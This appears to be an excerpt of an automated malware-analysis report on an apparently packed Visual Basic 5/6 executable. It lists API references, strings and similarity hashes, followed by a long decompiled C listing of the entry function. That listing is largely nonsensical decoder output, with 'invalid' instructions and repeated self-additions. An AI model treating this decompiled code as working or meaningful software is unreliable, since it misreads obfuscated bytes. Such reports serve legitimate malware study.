#580.MSVBVM60(BRDMASKINERNES,00000001), ref: 00413B6C
#534.MSVBVM60(BRDMASKINERNES,00000001), ref: 00413B71
__vbaStrCopy.MSVBVM60 ref: 00413B93
__vbaFreeStr.MSVBVM60 ref: 00413BBB
__vbaHresultCheckObj.MSVBVM60(00000000,00401110,004030F0,000002B4), ref: 00413C01
#595.MSVBVM60(00000003,00000000,?,?,?), ref: 00413C51
__vbaFreeVarList.MSVBVM60(00000004,00000003,?,?,?,00000003,00000000,?,?,?), ref: 00413C68

Strings

BRDMASKINERNES, xrefs: 00413B67
Java5, xrefs: 00413B85

Memory Dump Source

Source File: 00000000.00000002.822108895.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.822099643.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.822132596.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.822145627.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$List$#518#534#580#595CheckCopyHresult
String ID: BRDMASKINERNES$Java5
API String ID: 1094122113-3738844850
Opcode ID: 5831159d4c2dbd90caead5c58c7e3f8d78a3a8d47b5767f03bd748a4d0c1b1ba
Instruction ID: 4a6fb75758afafc88414a01086986b0423dbef476a0df629e56d45fad40d30d8
Opcode Fuzzy Hash: 5831159d4c2dbd90caead5c58c7e3f8d78a3a8d47b5767f03bd748a4d0c1b1ba
Instruction Fuzzy Hash: 1E51E5B1900228AFCB11DF94CC85EDEBBB8BF49304F1441AEE549B7291DB7856448B65

Uniqueness

Uniqueness Score: -1.00%

Function 004012F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 76%

			_entry_(signed int __eax, signed char __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _t266;
				void* _t267;
				intOrPtr* _t268;
				void* _t271;
				intOrPtr* _t273;
				intOrPtr* _t274;
				intOrPtr* _t275;
				intOrPtr* _t276;
				intOrPtr* _t279;
				intOrPtr* _t280;
				intOrPtr* _t281;
				intOrPtr* _t282;
				intOrPtr* _t283;
				intOrPtr* _t285;
				intOrPtr* _t286;
				intOrPtr* _t287;
				intOrPtr* _t288;
				intOrPtr* _t289;
				intOrPtr* _t290;
				intOrPtr* _t291;
				intOrPtr* _t292;
				intOrPtr* _t293;
				intOrPtr* _t295;
				intOrPtr* _t296;
				intOrPtr* _t297;
				intOrPtr* _t298;
				intOrPtr* _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				intOrPtr* _t303;
				intOrPtr* _t305;
				intOrPtr* _t306;
				intOrPtr* _t308;
				intOrPtr* _t309;
				intOrPtr* _t311;
				intOrPtr* _t312;
				intOrPtr* _t313;
				intOrPtr* _t314;
				intOrPtr* _t315;
				intOrPtr* _t316;
				intOrPtr* _t317;
				intOrPtr* _t319;
				intOrPtr* _t320;
				intOrPtr* _t321;
				intOrPtr* _t322;
				intOrPtr* _t323;
				intOrPtr* _t324;
				intOrPtr* _t325;
				intOrPtr* _t326;
				intOrPtr* _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;
				intOrPtr* _t331;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t336;
				intOrPtr* _t337;
				intOrPtr* _t338;
				intOrPtr* _t339;
				intOrPtr* _t340;
				intOrPtr* _t341;
				intOrPtr* _t342;
				signed char _t343;
				signed char _t344;
				intOrPtr* _t345;
				signed int _t347;
				signed int _t348;
				intOrPtr* _t349;
				intOrPtr* _t350;
				intOrPtr* _t351;
				intOrPtr* _t352;
				intOrPtr* _t353;
				intOrPtr* _t354;
				signed char _t355;
				intOrPtr* _t356;
				intOrPtr* _t357;
				void* _t358;
				intOrPtr* _t359;
				intOrPtr* _t360;
				intOrPtr* _t361;
				void* _t362;
				intOrPtr* _t363;
				intOrPtr* _t364;
				intOrPtr* _t365;
				intOrPtr* _t366;
				intOrPtr* _t367;
				intOrPtr* _t368;
				intOrPtr* _t370;
				signed int _t372;
				signed int _t373;
				signed char _t375;
				void* _t378;
				intOrPtr* _t379;
				signed int* _t380;
				signed int* _t381;
				signed int* _t382;
				signed int _t385;
				signed char _t388;
				signed char _t390;
				void* _t391;
				void* _t392;
				intOrPtr* _t393;
				void* _t394;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t398;
				void* _t399;
				intOrPtr* _t401;
				void* _t402;
				void* _t403;
				void* _t404;
				void* _t405;
				void* _t406;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t411;
				void* _t412;
				void* _t413;
				void* _t414;
				void* _t415;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				void* _t424;
				void* _t425;
				void* _t426;
				signed int _t430;
				void* _t434;
				intOrPtr* _t435;
				void* _t436;
				void* _t438;
				intOrPtr* _t439;
				intOrPtr* _t440;
				intOrPtr* _t441;
				intOrPtr* _t442;
				intOrPtr* _t443;
				void* _t444;
				intOrPtr* _t445;
				intOrPtr* _t446;
				void* _t447;
				void* _t448;
				intOrPtr* _t449;
				void* _t450;
				intOrPtr* _t451;
				intOrPtr* _t452;
				void* _t453;
				void* _t454;
				void* _t455;
				intOrPtr* _t456;
				void* _t457;
				intOrPtr* _t459;
				intOrPtr* _t460;
				void* _t461;
				void* _t462;
				signed char _t470;
				signed char _t471;
				void* _t474;
				void* _t477;
				signed int* _t478;
				signed int* _t480;
				void* _t481;
				signed int _t485;
				intOrPtr* _t488;
				intOrPtr* _t489;
				void* _t493;
				void* _t494;
				void* _t502;
				void* _t503;
				void* _t505;
				void* _t507;
				void* _t508;
				void* _t509;
				void* _t510;
				intOrPtr* _t519;
				intOrPtr _t526;
				void* _t534;

				_t469 = __edx;
				_t428 = __ecx;
				_t386 = __ebx;
				_push("VB5!6&*"); // executed
				L004012EA(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t266 = __eax + 1;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + __ecx;
				 *((intOrPtr*)(_t493 - 0x54d49d49)) =  *((intOrPtr*)(_t493 - 0x54d49d49)) - __ebx;
				_pop(_t481);
				_t474 = __edi - 1;
				 *__ebx = __ebx;
				if(_t474 >= 0) {
					asm("lock dec edi");
					 *_t266 =  *_t266 + _t266;
					 *_t266 =  *_t266 + _t266;
					 *_t266 =  *_t266 + _t266;
					 *_t266 =  *_t266 + _t266;
					 *_t266 =  *_t266 + _t266;
					 *_t266 =  *_t266 + _t266;
					_t385 = _t266;
					 *_t385 =  *_t385 + _t385;
					_t469 = __edx - __ecx + 1;
					_t474 = _t474 + 1;
					_t493 = _t493 + 1;
					_t481 = _t481 - 1;
					_t386 = __ebx + 2;
					 *_t385 =  *_t385 + _t385;
					 *_t385 =  *_t385 + _t385;
					 *_t385 =  *_t385 + _t385;
					 *_t385 =  *_t385 + _t385;
					_t505 = _t505 - 0xffffffffffffffff;
					 *_t385 =  *_t385 ^ _t385;
					_t266 = _t385 + 0x43f122d;
					asm("ror byte [0x1bd4fc1], 0x15");
					 *((intOrPtr*)(__ecx + 1 - 0xfffffffffffffffd)) =  *((intOrPtr*)(__ecx + 1 - 0xfffffffffffffffd)) + 0xa71cc384;
					_t428 = 0x82;
					asm("fdivp st2, st0");
					asm("rcr dword [ebp-0x52b0c5c8], 0x33");
					asm("cdq");
					asm("iretw");
					asm("adc [edi+0xaa000c], esi");
				}
				 *((intOrPtr*)(_t469 - 0x6c2ca000)) =  *((intOrPtr*)(_t469 - 0x6c2ca000)) + _t428;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				asm("aas");
				 *_t266 =  *_t266 + _t266;
				 *_t386 =  *_t386 + _t386;
				 *_t266 =  *_t266 + _t266;
				 *0x49525000 =  *0x49525000 + _t469;
				_push(_t505);
				_t494 = _t493 + 1;
				_push(_t469);
				_push(_t505);
				_push(_t386);
				_t507 = _t505;
				_push(_t494);
				_push(_t507);
				_t430 = _t428;
				_t485 = _t481 - 0xfffffffffffffffe;
				_push(_t386);
				 *0x54000c01 =  *0x54000c01 + _t430;
				_push(_t386);
				_push(_t507);
				_t477 = _t474 + 1;
				_t388 = _t386;
				_push(_t388);
				 *_t430 =  *_t430 + _t388;
				 *_t266 =  *_t266 + _t266;
				_t470 = _t469 + 1;
				 *_t470 =  *_t470 + _t266;
				_t508 = _t507 +  *((intOrPtr*)(_t507 + _t430));
				 *((intOrPtr*)(_t477 + 0x4d + _t430 * 2)) =  *((intOrPtr*)(_t477 + 0x4d + _t430 * 2)) + _t470;
				_push(_t388);
				_push(_t508);
				_t478 = _t477 - 1;
				_t390 = _t388;
				_t502 = _t494 + 1 + 2 - 1 + 2;
				_push(_t390);
				 *0x199a =  *0x199a + _t470;
				 *(_t266 + _t266) =  *(_t266 + _t266) & _t390;
				_t478[0x5c00005] = _t478[0x5c00005] + _t470;
				asm("sldt word [eax]");
				_t509 = _t508 + 1;
				 *((intOrPtr*)(_t485 + 2)) =  *((intOrPtr*)(_t485 + 2)) + _t266;
				 *_t430 =  *_t430 + 1;
				 *[es:eax] =  *[es:eax] + _t266;
				 *_t430 =  *_t430 + _t266;
				_t267 = _t266 + 0x78655400;
				if(_t267 == 0) {
					L8:
					_t268 = _t267 + 0x4200120b;
					_t519 = _t268;
					asm("gs outsb");
					if(_t519 != 0) {
						goto L14;
					} else {
						asm("outsb");
						asm("arpl [eax+0x61], bp");
						if(_t519 != 0) {
							goto L15;
						} else {
							asm("o16 jb 0x68");
							if(_t519 >= 0) {
								asm("aaa");
								 *_t470 =  *_t470 + _t470;
								 *_t268 =  *_t268 + _t268;
								 *_t390 =  *_t390 + 1;
								_t379 = _t268 -  *_t268;
								 *_t379 =  *_t379 + _t379;
								_t380 = _t379 +  *_t478;
								 *((intOrPtr*)(_t485 + 0x72)) =  *((intOrPtr*)(_t485 + 0x72)) + _t380;
								asm("popad");
								asm("insd");
								_t470 = _t470 ^  *[gs:eax];
								goto L12;
							}
						}
					}
				} else {
					 *_t470 =  *_t470 + _t267;
					_t381 = _t267 + 0xc6;
					 *(_t470 + 8) =  *(_t470 + 8) | _t390;
					es =  *((intOrPtr*)(_t390 + _t430));
					_pop(es);
					_t23 = _t502 + 0x61;
					 *_t23 =  *((intOrPtr*)(_t502 + 0x61)) + _t430;
					if( *_t23 >= 0) {
						L13:
						 *_t381 = _t381 +  *_t381;
						_t382 =  &(_t381[1]);
						 *((intOrPtr*)(_t390 + 0x68)) =  *((intOrPtr*)(_t390 + 0x68)) + _t382;
						asm("arpl [gs:ebx+0x32], bp");
						 *0x41000c01 =  *0x41000c01 + _t382;
						asm("outsb");
						asm("popad");
						_t485 =  *(_t390 + 0x6d) * 0x5007265;
						asm("salc");
						_push(ss);
						_t268 = _t382 + 0x39b06a8;
						L14:
						 *_t390 =  *_t390 + 1;
						_t268 = _t268;
						L15:
						 *_t268 =  *_t268 + _t268;
						 *0x6f430006 =  *0x6f430006 + _t268;
						asm("insd");
						asm("bound ebp, [edi+0x32]");
						 *_t478 =  *_t478 + _t268;
					} else {
						asm("popad");
						asm("adc al, [eax]");
						_t390 = _t390 + _t390;
						_t485 =  *_t430 * 0 +  *_t430;
						 *_t381 = _t381 +  *_t381;
						 *_t470 =  *_t470 + _t381;
						_t380 =  &(_t381[0x1e195500]);
						if(_t380 == 0) {
							L12:
							_t470 = _t470 ^  *_t380;
							 *_t390 =  *_t390 + _t380;
							 *_t430 =  *_t430 + _t430;
							 *((intOrPtr*)(_t390 + 0x54)) =  *((intOrPtr*)(_t390 + 0x54)) + _t470;
							_push(_t509);
							_push(_t502);
							_push(_t509);
							_t430 = _t470;
							 *0x54105f9 =  *0x54105f9 + _t380;
							_push(_t485);
							_t381 =  &(_t380[0x84804d]);
							_t390 = _t390 + _t390;
							_t502 = _t502 +  *((intOrPtr*)(_t381 + _t381));
							goto L13;
						} else {
							 *_t470 =  *_t470 + _t380;
							_push(es);
							_t267 = _t502;
							_t502 =  &(_t380[0x20]) + _t430;
							_t430 = _t430 +  *((intOrPtr*)(_t485 + 0x120b05));
							goto L8;
						}
					}
				}
				_pop(es);
				_t271 = _t268 + 0x476314ea;
				_t471 = _t271;
				_t434 = _t430 + 1 - 1 + 1 - 1;
				_t480 = _t478;
				_t488 = _t485 + 1;
				 *_t390 =  *_t390 + _t471;
				 *_t471 =  *_t471 + 1;
				_t273 = _t271 + 1;
				 *_t471 =  *_t471 + _t390;
				 *_t273 =  *_t273 + _t434;
				asm("daa");
				_t274 = _t273 + 1;
				 *_t274 =  *_t274 + _t274;
				 *_t274 =  *_t274 + _t274;
				_t391 = _t390 + _t390;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t274 =  *_t274 + 1;
				 *_t274 =  *_t274 + _t274;
				 *((intOrPtr*)(_t509 + _t502 + 0x40)) =  *((intOrPtr*)(_t509 + _t502 + 0x40)) + _t391;
				 *((intOrPtr*)(_t274 + 0x4151)) =  *((intOrPtr*)(_t274 + 0x4151)) + _t391;
				 *_t274 =  *_t274 + _t274;
				 *((intOrPtr*)(_t274 + 0x13)) =  *((intOrPtr*)(_t274 + 0x13)) + _t391;
				 *_t274 =  *_t274 - _t274;
				 *_t274 =  *_t274 + _t274;
				 *_t274 =  *_t274 + _t274;
				 *_t274 =  *_t274 + _t274;
				 *_t274 =  *_t274 + _t274;
				 *_t274 =  *_t274 + _t274;
				 *_t274 =  *_t274 + _t274;
				asm("adc [0x10040], dl");
				asm("sbb al, 0x0");
				 *_t480 =  *_t480 - _t274;
				_t275 = _t274 + 1;
				 *_t275 =  *_t275 + _t275;
				 *_t275 =  *_t275 + _t275;
				_t392 = _t391 + _t391;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t275 =  *_t275 + 1;
				 *_t275 =  *_t275 + _t275;
				 *((intOrPtr*)(_t509 + _t502 + 0x51d80040)) =  *((intOrPtr*)(_t509 + _t502 + 0x51d80040)) + _t392;
				_t435 = _t434 + 1;
				 *_t275 =  *_t275 + _t275;
				 *_t275 =  *_t275 + _t275;
				 *_t275 =  *_t275 + _t392;
				_t503 = _t509;
				asm("daa");
				 *_t275 =  *_t275 + _t275;
				 *_t275 =  *_t275 + _t275;
				 *_t275 =  *_t275 + _t275;
				 *_t275 =  *_t275 + _t275;
				 *_t275 =  *_t275 + _t275;
				 *_t275 =  *_t275 + _t275;
				 *((intOrPtr*)(_t275 + 0x15)) =  *((intOrPtr*)(_t275 + 0x15)) + _t435;
				_t276 = _t275 + 1;
				 *_t435 =  *_t435 + _t276;
				 *0x40272800 =  *0x40272800 + _t392;
				 *_t276 =  *_t276 + _t276;
				 *_t276 =  *_t276 + _t276;
				_t393 = _t392 + _t392;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t276 =  *_t276 + 1;
				 *_t276 =  *_t276 + _t276;
				_t279 = _t276 + _t435 - 0x40 + _t435;
				_push(_t435);
				_t436 = _t435 + 1;
				 *_t279 =  *_t279 + _t279;
				 *_t279 =  *_t279 + _t279;
				 *((intOrPtr*)(_t279 + 0x5d)) =  *((intOrPtr*)(_t279 + 0x5d)) + _t436;
				asm("daa");
				 *_t279 =  *_t279 + _t279;
				 *_t279 =  *_t279 + _t279;
				 *_t279 =  *_t279 + _t279;
				 *_t279 =  *_t279 + _t279;
				 *_t279 =  *_t279 + _t279;
				 *_t279 =  *_t279 + _t279;
				 *((intOrPtr*)(_t279 + 0x1004015)) =  *((intOrPtr*)(_t279 + 0x1004015)) + _t279;
				 *_t393 =  *_t393 + _t279;
				 *_t279 =  *_t279 + _t436;
				asm("daa");
				_t280 = _t279 + 1;
				 *_t280 =  *_t280 + _t280;
				 *_t280 =  *_t280 + _t280;
				_t394 = _t393 + _t393;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t280 =  *_t280 + 1;
				 *_t280 =  *_t280 + _t280;
				 *((intOrPtr*)(_t280 + _t503)) =  *((intOrPtr*)(_t280 + _t503)) + _t436;
				_t281 = _t280 + 1;
				 *((intOrPtr*)(_t281 + 0x50)) =  *((intOrPtr*)(_t281 + 0x50)) + _t436;
				 *_t281 =  *_t281 + _t281;
				 *_t281 =  *_t281 + _t281;
				 *((intOrPtr*)(_t281 + 0x2810)) =  *((intOrPtr*)(_t281 + 0x2810)) + _t394;
				 *_t281 =  *_t281 + _t281;
				 *_t281 =  *_t281 + _t281;
				 *_t281 =  *_t281 + _t281;
				 *_t281 =  *_t281 + _t281;
				 *_t281 =  *_t281 + _t281;
				 *((intOrPtr*)(_t281 + 0x1004015)) =  *((intOrPtr*)(_t281 + 0x1004015)) + _t394;
				 *((intOrPtr*)(_t281 + _t281)) =  *((intOrPtr*)(_t281 + _t281)) + _t281;
				 *_t480 =  *_t480 - _t281;
				_t282 = _t281 + 1;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				_t395 = _t394 + _t394;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t282 =  *_t282 + 1;
				 *_t282 =  *_t282 + _t282;
				 *((intOrPtr*)(_t282 + _t503)) =  *((intOrPtr*)(_t282 + _t503)) + _t395;
				_t283 = _t282 + 1;
				 *((intOrPtr*)(_t283 + 0x50)) =  *((intOrPtr*)(_t283 + 0x50)) + _t395;
				_t438 = _t436 + 2;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *((intOrPtr*)(_t283 + 0x2810)) =  *((intOrPtr*)(_t283 + 0x2810)) + _t438;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				asm("adc eax, 0x10040");
				_t285 = _t283 + _t471 + 0x40272800;
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t285;
				_t396 = _t395 + _t395;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t285 =  *_t285 + 1;
				 *_t285 =  *_t285 + _t285;
				 *((intOrPtr*)(_t285 + _t503 + 0x40)) =  *((intOrPtr*)(_t285 + _t503 + 0x40)) + _t438;
				 *((intOrPtr*)(_t285 + 0x50)) =  *((intOrPtr*)(_t285 + 0x50)) + _t438;
				_t439 = _t438 + 1;
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t285;
				 *((intOrPtr*)(_t285 + 0x2810)) =  *((intOrPtr*)(_t285 + 0x2810)) + _t396;
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t439;
				_push(ss);
				_t286 = _t285 + 1;
				 *_t439 =  *_t439 + _t286;
				 *_t488 =  *_t488 + _t286;
				 *_t286 =  *_t286 + _t439;
				asm("daa");
				_t287 = _t286 + 1;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				_t397 = _t396 + _t396;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t287 =  *_t287 + 1;
				 *_t287 =  *_t287 + _t287;
				 *((intOrPtr*)(_t287 + _t503 + 0x50780040)) =  *((intOrPtr*)(_t287 + _t503 + 0x50780040)) + _t397;
				_t440 = _t439 + 1;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *((intOrPtr*)(_t287 + 0x10)) =  *((intOrPtr*)(_t287 + 0x10)) + _t397;
				 *_t287 =  *_t287 - _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				asm("pushad");
				_push(ss);
				_t288 = _t287 + 1;
				 *_t440 =  *_t440 + _t288;
				 *_t480 =  *_t480 + _t288;
				 *_t288 =  *_t288 + _t440;
				asm("daa");
				_t289 = _t288 + 1;
				 *_t289 =  *_t289 + _t289;
				 *_t289 =  *_t289 + _t289;
				_t398 = _t397 + _t397;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t289 =  *_t289 + 1;
				 *_t289 =  *_t289 + _t289;
				_t290 = _t289 + _t440;
				 *_t290 =  *_t290 - _t290;
				 *(_t290 + 0x41) = _t471;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t440;
				asm("adc [eax], ebp");
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *((intOrPtr*)(_t290 + 0x1004016)) =  *((intOrPtr*)(_t290 + 0x1004016)) + _t398;
				 *_t290 =  *_t290 + _t440;
				 *_t290 =  *_t290 + _t440;
				asm("daa");
				_t291 = _t290 + 1;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				_t399 = _t398 + _t398;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t291 =  *_t291 + 1;
				 *_t291 =  *_t291 + _t291;
				_t292 = _t291 + _t399;
				 *_t292 =  *_t292 - _t292;
				_t293 = _t292;
				_push(_t293);
				_t441 = _t440 + 1;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *((intOrPtr*)(_t293 + 0x2810)) =  *((intOrPtr*)(_t293 + 0x2810)) + _t441;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				_t295 = _t293 + _t471 + 1;
				 *_t441 =  *_t441 + _t295;
				 *_t441 =  *_t441 + _t441;
				 *_t295 =  *_t295 + _t441;
				asm("daa");
				_t296 = _t295 + 1;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t296 =  *_t296 + 1;
				 *_t296 =  *_t296 + _t296;
				 *((intOrPtr*)(_t441 + _t503)) =  *((intOrPtr*)(_t441 + _t503)) + _t441;
				_t297 = _t296 + 1;
				 *((intOrPtr*)(_t297 + 0x4150)) =  *((intOrPtr*)(_t297 + 0x4150)) + _t441;
				 *_t297 =  *_t297 + _t297;
				 *((intOrPtr*)(_t297 + 0x10)) =  *((intOrPtr*)(_t297 + 0x10)) + _t441;
				 *_t297 =  *_t297 - _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t480 =  *_t480 | _t471;
				_t298 = _t297 + 1;
				 *_t441 =  *_t441 + _t298;
				 *_t471 =  *_t471 + _t441;
				 *_t298 =  *_t298 + _t441;
				asm("daa");
				_t299 = _t298 + 1;
				 *_t299 =  *_t299 + _t299;
				 *_t299 =  *_t299 + _t299;
				_t401 = _t399 + _t399 + _t399 + _t399;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t299 =  *_t299 + 1;
				 *_t299 =  *_t299 + _t299;
				 *((intOrPtr*)(_t441 + _t503 + 0x40)) =  *((intOrPtr*)(_t441 + _t503 + 0x40)) + _t401;
				 *((intOrPtr*)(_t299 + 0x4150)) =  *((intOrPtr*)(_t299 + 0x4150)) + _t401;
				 *_t299 =  *_t299 + _t299;
				 *((intOrPtr*)(_t299 + 0x11)) =  *((intOrPtr*)(_t299 + 0x11)) + _t441;
				 *_t299 =  *_t299 - _t299;
				 *_t299 =  *_t299 + _t299;
				 *_t299 =  *_t299 + _t299;
				 *_t299 =  *_t299 + _t299;
				 *_t299 =  *_t299 + _t299;
				 *_t299 =  *_t299 + _t299;
				 *_t299 =  *_t299 + _t299;
				ss = ss;
				_t301 = _t299 + 2;
				 *_t441 =  *_t441 + _t301;
				 *_t401 =  *_t401 + _t441;
				 *_t301 =  *_t301 + _t441;
				asm("daa");
				_t302 = _t301 + 1;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				_t402 = _t401 + _t401;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t302 =  *_t302 + 1;
				 *_t302 =  *_t302 + _t302;
				 *((intOrPtr*)(_t441 + _t503 + 0x50c80040)) =  *((intOrPtr*)(_t441 + _t503 + 0x50c80040)) + _t441;
				_t442 = _t441 + 1;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				 *((intOrPtr*)(_t302 + 0x11)) =  *((intOrPtr*)(_t302 + 0x11)) + _t402;
				 *_t302 =  *_t302 - _t302;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				if( *_t302 >= 0) {
					_t378 = _t302 + 1;
					 *_t442 =  *_t442 + _t378;
					 *((intOrPtr*)(_t378 + _t378)) =  *((intOrPtr*)(_t378 + _t378)) + _t442;
					 *_t480 =  *_t480 - _t378;
					_t302 = _t378 + 1;
					 *_t302 =  *_t302 + _t302;
					 *_t302 =  *_t302 + _t302;
					_t402 = _t402 + _t402;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t302 =  *_t302 + 1;
					_t526 =  *_t302;
				}
				 *_t302 =  *_t302 + _t302;
				 *((intOrPtr*)(_t442 + _t503 + 0x50d80040)) =  *((intOrPtr*)(_t442 + _t503 + 0x50d80040)) + _t402;
				_t443 = _t442 + 1;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				_t303 = _t302 + _t443;
				asm("adc [eax], ebp");
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *((intOrPtr*)(_t303 + 0x1004017)) =  *((intOrPtr*)(_t303 + 0x1004017)) + _t471;
				 *0x40272800 =  *0x40272800 + _t443;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				_t403 = _t402 + _t402;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t303 =  *_t303 + 1;
				 *_t303 =  *_t303 + _t303;
				 *((intOrPtr*)(_t303 + _t443)) =  *((intOrPtr*)(_t303 + _t443)) - _t303 + _t443;
				_t305 = L00405921(_t303 + _t443, _t443, _t471, _t488, _t526, _t534);
				 *_t305 =  *_t305 + _t305;
				_t306 = _t305 + _t403;
				asm("adc [eax], ebp");
				 *_t306 =  *_t306 + _t306;
				 *_t306 =  *_t306 + _t306;
				 *_t306 =  *_t306 + _t306;
				 *_t306 =  *_t306 + _t306;
				 *_t306 =  *_t306 + _t306;
				 *_t306 =  *_t306 + _t306;
				_pop(ss);
				_t308 = _t306 + _t443 + 1;
				 *_t443 =  *_t443 + _t308;
				 *_t488 =  *_t488 + _t443;
				 *_t308 =  *_t308 + _t443;
				asm("daa");
				_t309 = _t308 + 1;
				 *_t309 =  *_t309 + _t309;
				 *_t309 =  *_t309 + _t309;
				_t404 = _t403 + _t403;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t309 =  *_t309 + 1;
				 *_t309 =  *_t309 + _t309;
				 *((intOrPtr*)(_t471 + _t503)) =  *((intOrPtr*)(_t471 + _t503)) + _t404;
				_t311 = _t309 + 1 + _t404;
				_t444 = _t443 + 1;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *((intOrPtr*)(_t311 + 0x2812)) =  *((intOrPtr*)(_t311 + 0x2812)) + _t404;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				asm("sbb [eax], al");
				 *_t311 =  *_t311 + _t311;
				asm("verw word [eax]");
				asm("daa");
				_t312 = _t311 + 1;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
				_t405 = _t404 + _t404;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t312 =  *_t312 + 1;
				 *_t312 =  *_t312 + _t312;
				 *((intOrPtr*)(_t471 + _t503 + 0x40)) =  *((intOrPtr*)(_t471 + _t503 + 0x40)) + _t444;
				 *_t312 =  *_t312 + _t444;
				_t445 = _t444 + 1;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
